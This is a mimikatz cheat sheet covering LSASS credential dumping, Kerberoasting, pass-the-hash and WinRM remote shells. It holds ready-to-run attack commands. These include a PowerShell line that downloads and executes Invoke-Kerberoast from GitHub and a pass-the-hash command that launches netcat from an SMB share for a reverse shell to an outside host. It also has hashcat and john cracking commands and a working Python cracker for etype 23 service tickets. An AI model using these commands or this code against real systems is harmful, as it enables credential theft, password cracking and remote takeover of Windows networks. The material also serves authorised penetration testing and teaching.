mimikatz

mimikatz is a post-exploitation tool that extracts plaintext passwords, NTLM hashes, PIN codes and Kerberos tickets from LSASS memory on Windows. Reading LSASS requires SeDebugPrivilege, so run it from an elevated prompt (local administrator or SYSTEM); the stock binary is flagged by Defender and most EDR products, so expect it to be detected on monitored hosts.

Basic Commands

  • Enumerate domain users (an ordinary Windows command, not a mimikatz module; run it from cmd or PowerShell before starting mimikatz):

    net user /domain
  • Acquire SeDebugPrivilege, which the sekurlsa:: modules need to read LSASS memory. Expect "Privilege '20' OK"; if this fails you are not running elevated and the dumps below will fail too:

    privilege::debug
  • Dump credentials from every logon session: NTLM hashes, Kerberos keys, and plaintext passwords where WDigest caching is still enabled:

    sekurlsa::logonpasswords
  • List Kerberos tickets from every logon session (append /export to write each one to a .kirbi file):

    sekurlsa::tickets

Kerberoasting (Extracting Kerberos Tickets)

  • Export the current user's cached tickets as .kirbi files. This reads the caller's own logon session, so no debug privilege is needed, but it only writes tickets that are already cached: request a service ticket for the SPN you want to attack first (for example with the .NET KerberosRequestorSecurityToken class). The exported service ticket is encrypted with the service account's key, which is what the offline crack recovers:

    kerberos::list /export

    If running mimikatz on the host is not an option, Invoke-Kerberoast requests the service tickets itself and prints them in crackable form (note that this one-liner fetches the script from GitHub over the network; host a copy yourself if that matters):

    powershell -ep bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt"
    john --format=krb5tgs kerb-Hash0.txt --wordlist=/usr/share/wordlists/rockyou.txt
  • Other crackers. tgsrepcrack.py (from Tim Medin's kerberoast) takes the exported .kirbi directly; hashcat mode 13100 is the RC4 (etype 23) TGS-REP format. If the service account is configured for AES only, the ticket will be etype 17 or 18 and needs hashcat modes 19600/19700 instead:

    python tgsrepcrack.py /usr/share/wordlists/rockyou.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
    hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
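The crackers above all do the same thing with a $krb5tgs$23$ line. What follows is an added example, not code from the page or from mimikatz, hashcat or john: a pure-Python re-implementation of the RC4-HMAC (etype 23) check that hashcat -m 13100 and john --format=krb5tgs perform, plus a generator that builds a sample line from a constructed service-account password and ticket body so the whole thing runs offline. The account sqlsvc, the password Summer2019!, the SPN and the ticket body are made up; MD4 is written out because hashlib's md4 is missing on OpenSSL 3 builds.

```python
import hashlib
import hmac
import os
import re
import struct

def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, written out because hashlib's md4 is missing on OpenSSL 3 builds."""
    mask = 0xFFFFFFFF
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (F, 0x00000000, range(16), (3, 7, 11, 19)),
        (G, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, k_add, order, shifts in rounds:
            for i, k in enumerate(order):
                a = rotl((a + fn(b, c, d) + X[k] + k_add) & mask, shifts[i % 4])
                a, b, c, d = d, a, b, c
        state = [(s + v) & mask for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)

def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); for RC4-HMAC (etype 23) it is also the Kerberos key."""
    return md4(password.encode("utf-16-le"))

def rc4(key: bytes, data: bytes) -> bytes:
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

KEY_USAGE_TICKET = 2  # RFC 4120 key usage for a ticket's enc-part, which is what a TGS-REP carries

def _k1(key: bytes, usage: int) -> bytes:
    return hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()

def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes = b"") -> tuple:
    """RFC 4757 encryption as the KDC does it. Returns (checksum, ciphertext): the two hex
    fields that end a $krb5tgs$23$ line."""
    data = (confounder or os.urandom(8)) + plaintext
    k1 = _k1(key, usage)
    checksum = hmac.new(k1, data, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum, rc4(k3, data)

def make_krb5tgs23(service_password: str, user: str, realm: str, spn: str, ticket_body: bytes) -> str:
    """Constructed sample line in the layout hashcat mode 13100 expects."""
    checksum, edata2 = rc4_hmac_encrypt(nt_hash(service_password), KEY_USAGE_TICKET, ticket_body)
    return f"$krb5tgs$23$*{user}${realm}${spn}*${checksum.hex()}${edata2.hex()}"

_LINE = re.compile(r"^\$krb5tgs\$23\$\*([^$]*)\$([^$]*)\$([^$]*)\*\$([0-9a-fA-F]{32})\$([0-9a-fA-F]+)$")

def parse_krb5tgs23(line: str) -> dict:
    m = _LINE.match(line.strip())
    if not m:
        raise ValueError("not a $krb5tgs$23$ (hashcat 13100) line; AES tickets are etype 17/18")
    user, realm, spn, checksum, edata2 = m.groups()
    return {"user": user, "realm": realm, "spn": spn,
            "checksum": bytes.fromhex(checksum), "edata2": bytes.fromhex(edata2)}

def check_candidate(parsed: dict, password: str) -> bool:
    """One guess, fully offline: K1 from the candidate's NT hash, K3 from the checksum,
    RC4-decrypt, then see whether the HMAC over the plaintext reproduces the checksum."""
    k1 = _k1(nt_hash(password), KEY_USAGE_TICKET)
    k3 = hmac.new(k1, parsed["checksum"], hashlib.md5).digest()
    data = rc4(k3, parsed["edata2"])
    return hmac.compare_digest(hmac.new(k1, data, hashlib.md5).digest(), parsed["checksum"])

def crack_krb5tgs23(line: str, wordlist):
    """Returns the first wordlist entry that decrypts the ticket, or None."""
    parsed = parse_krb5tgs23(line)
    return next((w for w in wordlist if check_candidate(parsed, w)), None)

if __name__ == "__main__":
    # Constructed: service account sqlsvc with a weak password and a fake ticket body.
    line = make_krb5tgs23("Summer2019!", "sqlsvc", "MEDIN.LOCAL",
                          "MSSQLSvc/sql01.medin.local:1433", b"constructed EncTicketPart")
    print(line)
    print("cracked:", crack_krb5tgs23(line, ["password", "Welcome1", "Summer2019!"]))
```

Every guess costs one MD4 and three HMAC-MD5 operations plus an RC4 pass, which is why etype 23 tickets crack so fast and why a long service-account password (or AES-only, which replaces this with PBKDF2-derived keys) is the defence. A real cracker rejects most wrong guesses earlier by checking that the decrypted bytes after the confounder start with the ASN.1 tag of EncTicketPart before computing the full HMAC; this version always does the full check for clarity.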

Pass-the-Hash & Command Execution

  • Pass-the-Hash: start a process whose logon session authenticates with the given NT hash instead of a password (needs privilege::debug, because it patches the new session's credentials in LSASS). Here the spawned process is netcat from an SMB share, giving a reverse shell to 192.168.119.1:443:

    sekurlsa::pth /user:username /domain:domain.com /ntlm:7c... /run:"\\192.168.119.1\a\bin\nc.exe -nv 192.168.119.1 443 -e cmd.exe"
  • Evil-WinRM for a remote shell over WinRM (TCP 5985/5986); it also accepts an NT hash directly via -H in place of -p, so a dumped hash is enough:

    rbenv shell 2.7.4 ; gem install evil-winrm
    evil-winrm -u user -p pass -i 10.11.1.1